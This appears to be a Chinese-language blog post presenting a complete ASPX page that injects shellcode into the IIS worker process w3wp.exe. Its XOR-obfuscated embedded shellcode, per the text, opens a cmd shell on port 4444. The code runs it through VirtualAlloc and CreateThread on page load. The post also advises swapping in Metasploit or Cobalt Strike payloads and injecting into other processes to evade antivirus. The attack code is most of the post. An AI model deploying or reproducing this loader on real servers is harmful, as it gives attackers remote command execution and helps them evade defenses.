抱歉,您的浏览器无法访问本站
本页面需要浏览器支持(启用)JavaScript
了解详情 >

在asp.net + iis + windows环境中,由于asp.net可以运行C#代码,可以通过pinvoke调用系统函数来将shellcode直接注入iis宿主进程(w3wp.exe)或者其他进程(如果权限足够)。

直接将shellcode载入w3wp.exe的代码,自带的shellcode为监听4444端口并在该端口提供cmd shell,可自行生成其他shellcode替换,实测包括msf生成的正反向shell,cs生成的payload等均不需要调用WaitForSingleObject等待其执行。

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<%@ Page Language="C#" %>
<%@ import Namespace="System"%>
<%@ import Namespace="System.Runtime.InteropServices"%>
<script language="c#" runat="server">
[DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(uint lpThreadAttributes,uint dwStackSize, IntPtr lpStartAddress,IntPtr param, uint dwCreationFlags, ref uint lpThreadId);
private static byte[] xor(byte[] cipher, byte[] key){
byte[] decrypted = new byte[cipher.Length];
for (int i = 0; i < cipher.Length; i++){
decrypted[i] = (byte)(cipher[i] ^ key[i % key.Length]);
}
return decrypted;
}
public void Page_Load(object sender, EventArgs e){
byte[] esc = new byte[505] {
0x88,0x2D,0xF0,0x90,0x9B,0x8D,0xB9,0x74,0x65,0x73,0x35,0x3A,0x24,0x29,0x26,0x34,0x25,0x3C,0x5A,0xB7,0x1C,0x3C,0xEE,0x21,0x14,0x23,0xEE,0x2B,0x6C,0x2D,0xF8,0x26,0x4B,0x2D,0xF2,0x06,0x35,0x3B,0x7B,0xDC,0x2F,0x33,0x39,0x54,0xBA,0x3C,0x5A,0xA5,0xD5,0x48,0x04,0x0F,0x76,0x47,0x45,0x38,0xB5,0xAC,0x7E,0x35,0x6A,0xA4,0x9B,0x99,0x37,0x32,0x25,0x23,0xEE,0x2B,0x54,0xEE,0x31,0x48,0x23,0x64,0xA9,0xFF,0xE5,0xFB,0x74,0x6B,0x65,0x31,0xF1,0xA5,0x07,0x13,0x23,0x64,0xA9,0x24,0xEE,0x3B,0x6C,0x2F,0xEE,0x39,0x54,0x2C,0x72,0xA4,0x88,0x33,0x31,0x8B,0xAC,0x32,0xFF,0x5F,0xED,0x31,0x75,0xB3,0x3E,0x45,0xA2,0x2D,0x48,0xB4,0xC9,0x32,0xB5,0xA2,0x68,0x38,0x75,0xA4,0x4B,0x94,0x1E,0x94,0x35,0x77,0x29,0x57,0x7C,0x2E,0x5C,0xA8,0x01,0xBD,0x2B,0x30,0xE0,0x25,0x5D,0x3D,0x64,0xA3,0x12,0x2A,0xEE,0x75,0x3C,0x21,0xF8,0x34,0x77,0x2C,0x78,0xA4,0x24,0xF8,0x70,0xE3,0x2D,0x78,0xA4,0x24,0x2B,0x35,0x33,0x3B,0x20,0x2E,0x24,0x2B,0x35,0x32,0x24,0x23,0x3C,0xE6,0x9F,0x54,0x2A,0x37,0x86,0x94,0x3D,0x32,0x2D,0x31,0x2D,0xF2,0x66,0x8C,0x24,0x8B,0x94,0x9A,0x24,0x3D,0xDB,0x04,0x07,0x59,0x3A,0x4A,0x46,0x65,0x73,0x35,0x3D,0x2C,0xF0,0x92,0x2D,0xF2,0x98,0xCB,0x64,0x79,0x74,0x2C,0xFA,0x91,0x22,0xD9,0x7B,0x74,0x74,0x2F,0x74,0x6B,0x65,0x79,0x35,0x31,0x3A,0xFD,0x8F,0x29,0xF0,0x85,0x24,0xC9,0x38,0x1C,0x43,0x7E,0x8B,0xB0,0x3F,0xFD,0x81,0x0D,0x78,0x75,0x65,0x73,0x2D,0x2A,0xDF,0x50,0xF4,0x0E,0x73,0x8B,0xBE,0x35,0x29,0x39,0x54,0xBA,0x39,0x5A,0xA5,0x31,0x8B,0xA5,0x3B,0xFD,0xA9,0x2D,0x86,0xB4,0x2D,0xFA,0xB5,0x2A,0xDF,0x93,0x7B,0xBA,0x93,0x8B,0xBE,0x2D,0xF0,0xB3,0x0F,0x63,0x35,0x33,0x29,0xF0,0x96,0x2D,0xFA,0x8D,0x2A,0xDF,0xBB,0xAF,0x52,0x14,0x8B,0xBE,0x2D,0x48,0xA6,0x2D,0xFA,0x8D,0x2A,0xDF,0xCE,0x9D,0x5D,0x8C,0x8B,0xBE,0x28,0x48,0xB4,0x2D,0x42,0xA6,0x23,0xEC,0x80,0x35,0xDF,0x07,0x98,0x50,0x84,0x86,0xA1,0x2D,0xFA,0x8D,0x23,0xEC,0xBE,0x35,0xDF,0x06,0x1A,0x26,0x04,0x86,0xA1,0x2D,0xF2,0xB0,0xCB,0x67,0x79,0x74,0x2C,0xCB,0x17,0x06,0x01,0x79,0x74,0x65,0x73,0x74,0x2A,0x35,0x38,0x24,0x2D,0xFA,0x96,0x3C,0x32,0x2E,0x39,0x54,0xB3,0x1E,0x66,0x3C,0x38,0x24,0x87,0x8F,0x12,0xAC,0x21,0x5D,0x20,0x64,0x72,0x3C,0xE6,0x21,0x5D,0x6C,0xA3,0x73,0x1C,0x23,0xEC,0x9F,0x22,0x35,0x32,0x24,0x2A,0x35,0x38,0x24,0x2C,0x8C,0xB4,0x2A,0x35,0x30,0x8B,0xAD,0x3E,0xFD,0xAA,0x29,0xF0,0xB5,0x24,0xC9,0x0D,0xA7,0x5A,0xFF,0x8B,0xB0,0x3B,0x45,0xB9,0x2D,0x86,0xBE,0xEE,0x7D,0x35,0xD1,0x6D,0xFE,0x69,0x05,0x8C,0xA1,0xD0,0x95,0xCC,0xD6,0x33,0x32,0xCE,0xCD,0xF0,0xC4,0xE9,0x9A,0xA6,0x3C,0xE8,0xA1,0x51,0x48,0x63,0x0F,0x7E,0xEB,0x9E,0x99,0x01,0x60,0xC8,0x33,0x78,0x17,0x16,0x1E,0x65,0x2A,0x35,0xE2,0xBF,0x86,0xA1 };
byte[] sc = xor(esc, new byte[7] { 0x74, 0x65, 0x73, 0x74, 0x6B, 0x65, 0x79 });
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x1000, 0x40);
Marshal.Copy(sc, 0, funcAddr, sc.Length);
IntPtr hThread = IntPtr.Zero;
uint threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
Response.Write("CreateThread: 0x" + hThread.ToString("x2") + "<br>");
return;
}
</script>

备注

如果权限足够,还可以对代码稍加修改,加上OpenProcess配合VirtualAllocExCreateRemoteThread函数可以直接将shellcode注入到其他进程,可以规避杀软经常采取的限制w3wp进程启动其他程序的限制。

评论